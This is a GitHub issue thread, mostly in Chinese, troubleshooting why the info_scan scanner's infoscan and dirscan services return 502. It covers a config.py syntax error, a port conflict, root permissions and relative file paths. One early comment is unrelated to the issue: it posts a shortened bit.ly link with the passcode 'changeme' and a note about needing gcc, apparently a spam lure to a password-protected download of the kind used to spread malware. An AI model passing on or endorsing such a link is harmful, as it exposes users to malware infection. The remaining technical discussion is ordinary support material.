### ISSUE TITLE
使用时infoscan和dirscan无法启动，求高手指点！

### ISSUE THREAD

**Issue by YK1ngH** [huan-cdm/info_scan#10]
我就是照着你的思路顺下来的，安装了两遍问题都是：
![image](https://github.com/user-attachments/assets/c165d2ec-bcf7-4e78-96cc-bbd1418842af)
infoscan和dirscan无法启动
然后打开界面显示502：
![image](https://github.com/user-attachments/assets/9d9c002c-a45a-4a18-ad02-5f80932e6d3f)
我用的是虚拟机安装，请问时哪里出了问题呀

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by tongxile** [comment]
+1
网盘两个虚拟机都试了，都不好使

**Comment by huan-cdm** [comment]
1. 后端python服务未启动，nginx返回502；
2. 运行python3 /TIP/info_scan/scan_main_web.py和python3 /TIP/info_scan/dirscanmain.py分别把报错信息贴出来；
3. root用户下启动,sudo -s

**Comment by YK1ngH** [comment]
您好，我按着您的建议，已经做了正常启动：
![image](https://github.com/user-attachments/assets/ffc91e11-1026-4744-a5ef-308854d45cfb)
也执行了bash /TIP/info_scan/server_check.sh start命令，启动了nginx、mysql，结果打开之后还是502：
![image](https://github.com/user-attachments/assets/f5d75e3c-959f-4877-9eb5-d4fe3043ee93)
之前的问题出现在脚本缩进上，我已经修改好了，现在正常启动还是502是什么原因呢

**Comment by tongxile** [comment]
> 1. 后端python服务未启动，nginx返回502；
> 2. 运行python3 /TIP/info_scan/scan_main_web.py和python3 /TIP/info_scan/dirscanmain.py分别把报错信息贴出来；
> 3. root用户下启动,sudo -s

root@root:/home/huan# python3 /TIP/info_scan/scan_main_web.py
Traceback (most recent call last):
  File "/TIP/info_scan/scan_main_web.py", line 12, in <module>
    import basic
  File "/TIP/info_scan/basic.py", line 9, in <module>
    from config import shodankey
  File "/TIP/info_scan/config.py", line 11
    dict_key2 = {"email"":"","key":""}
                                    ^
SyntaxError: unterminated string literal (detected at line 11)
root@root:/home/huan# python3 /TIP/info_scan/dirscanmain.py
Traceback (most recent call last):
  File "/TIP/info_scan/dirscanmain.py", line 28, in <module>
    from config import dict
  File "/TIP/info_scan/config.py", line 11
    dict_key2 = {"email"":"","key":""}
                                    ^
SyntaxError: unterminated string literal (detected at line 11)
root@root:/home/huan#

**Comment by YK1ngH** [comment]
> > 1. 后端python服务未启动，nginx返回502；
> > 2. 运行python3 /TIP/info_scan/scan_main_web.py和python3 /TIP/info_scan/dirscanmain.py分别把报错信息贴出来；
> > 3. root用户下启动,sudo -s
> 
> root@root:/home/huan# python3 /TIP/info_scan/scan_main_web.py Traceback (most recent call last): File "/TIP/info_scan/scan_main_web.py", line 12, in import basic File "/TIP/info_scan/basic.py", line 9, in from config import shodankey File "/TIP/info_scan/config.py", line 11 dict_key2 = {"email"":"","key":""} ^ SyntaxError: unterminated string literal (detected at line 11) root@root:/home/huan# python3 /TIP/info_scan/dirscanmain.py Traceback (most recent call last): File "/TIP/info_scan/dirscanmain.py", line 28, in from config import dict File "/TIP/info_scan/config.py", line 11 dict_key2 = {"email"":"","key":""} ^ SyntaxError: unterminated string literal (detected at line 11) root@root:/home/huan#

只配置一个的话，你可以注释掉上面的然后把单个key的取消注释

**Comment by YK1ngH** [comment]
> 您好，我按着您的建议，已经做了正常启动： ![image](https://private-user-images.githubusercontent.com/106744775/365015483-ffc91e11-1026-4744-a5ef-308854d45cfb.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU1OTIzMzUsIm5iZiI6MTcyNTU5MjAzNSwicGF0aCI6Ii8xMDY3NDQ3NzUvMzY1MDE1NDgzLWZmYzkxZTExLTEwMjYtNDc0NC1hNWVmLTMwODg1NGQ0NWNmYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTA2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkwNlQwMzA3MTVaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mYTdhNGE4ZjE0YzRlN2VlZjI5ZTA1OWY1ZDRmMjg1YTkyZWVhYjU5MGIwZDQzMGE2MDY0YWFkMjIxZjI5NTk5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.P9jm7sW9F3E3XbMmO4qhihYrZWHxIlJqSIi9MBU4inw) 也执行了bash /TIP/info_scan/server_check.sh start命令，启动了nginx、mysql，结果打开之后还是502： ![image](https://private-user-images.githubusercontent.com/106744775/365015633-f5d75e3c-959f-4877-9eb5-d4fe3043ee93.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjU1OTIzMzUsIm5iZiI6MTcyNTU5MjAzNSwicGF0aCI6Ii8xMDY3NDQ3NzUvMzY1MDE1NjMzLWY1ZDc1ZTNjLTk1OWYtNDg3Ny05ZWI1LWQ0ZmUzMDQzZWU5My5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTA2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkwNlQwMzA3MTVaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lZGUxOTdmYTI5OGMyNmIyZmVhOTBiMGIxMDExMDIyZDcwMmQ2ODUwNDU5MDU5ZGYyMjI0OWI5ZWI3MTgwYzdiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.NA9mPngoJMdMLv3p9dqcDin7Z-xu7u8tzuMSUqkUj-E) 之前的问题出现在脚本缩进上，我已经修改好了，现在正常启动还是502是什么原因呢

@huan-cdm 该问题已解决，问题出现在端口冲突，具体可按照之前的issue进行修改

**Comment by huan-cdm** [comment]
@tongxile 配置config.py中的相关参数

**Comment by tongxile** [comment]
配置config.py中的相关参数，改完了重启还这样

root@root:~# bash /TIP/info_scan/server_check.sh start
infoscan： X
dirscan： X
xrayreport： √
afrogreport： √
urlfinderreport： √
root@root:~# service nginx start
root@root:~# service mysql start
root@root:~# python3 /TIP/info_scan/scan_main_web.py
 * Serving Flask app 'scan_main_web'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:8005
Press CTRL+C to quit
root@root:~python3 /TIP/info_scan/dirscanmain.pypy
 * Serving Flask app 'dirscanmain'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:8088
Press CTRL+C to quit
root@root:~#

**Comment by huan-cdm** [comment]
@YK1ngH 我这边都是正常的，环境跟你那个是一样的
![image](https://github.com/user-attachments/assets/7c43a95b-c6b7-4e60-84ab-0e79ffebcbed)
![image](https://github.com/user-attachments/assets/be2396cb-dca7-418e-8661-8d77af79d68a)

数据库账号密码不要修改，用默认的就行。
![image](https://github.com/user-attachments/assets/51b76fb8-f967-4d40-8eec-582a3d53f47b)

**Comment by huan-cdm** [comment]
@tongxile 环境没问题，把报错信息截图发上来，别贴文字

**Comment by YK1ngH** [comment]
@huan-cdm 作者您好！数据库账密修改完毕后，数据库暂时没有什么问题了，目前看上去info_scan目录下可能缺少finger.sh文件，可能这个是造成IP搜索中，显示接口异常的原因，但是还不确定，您看下是否需要这个文件呢；
![image](https://github.com/user-attachments/assets/df90bb2e-bd3e-4c84-9321-d6814ea777e6)
再就是针对目录扫描返回500的情况，以下是dirscanmain.py运行时的报错截图，这个您知道是什么原因嘛
![image](https://github.com/user-attachments/assets/c7b438c4-751c-47f9-8d88-006fdaae0b2e)

**Comment by huan-cdm** [comment]
@YK1ngH 
![image](https://github.com/user-attachments/assets/32f93c27-d32c-47f5-b2cb-f8af9970bc01)
我这都是正常的，你那边虚拟机可以出网吧

**Comment by huan-cdm** [comment]
@YK1ngH 你发的最后一条截图，截个全图

**Comment by huan-cdm** [comment]
![image](https://github.com/user-attachments/assets/01c49b1c-dc70-40d4-ae30-6a6b77fbd911)
@YK1ngH 用root权限启动，不要用普通权限启动服务

**Comment by huan-cdm** [comment]
![image](https://github.com/user-attachments/assets/085b9f89-88a3-4318-a51d-9124e108f167)
@YK1ngH

**Comment by YK1ngH** [comment]
作者您好，目前又解决了部分问题，已发现在用xftp上传文件时，部分文件被系统查杀、文件权限设置错误，针对17777端口服务启动失败的问题，只能cd到/TIP/info_scan目录下做执行，否则检测不到finger.sh文件，会报错，不能sudo python3 /TIP/info_scan/dirscanmain.py，会报错，目前看来系统已经正常运行了，我在这里留下debug的过程，或许对他人有用。
明天我再深度体验下，及时给作者反馈！

**Comment by huan-cdm** [comment]
感谢支持，有的文件采用相对路径，后期全部改成绝对路径
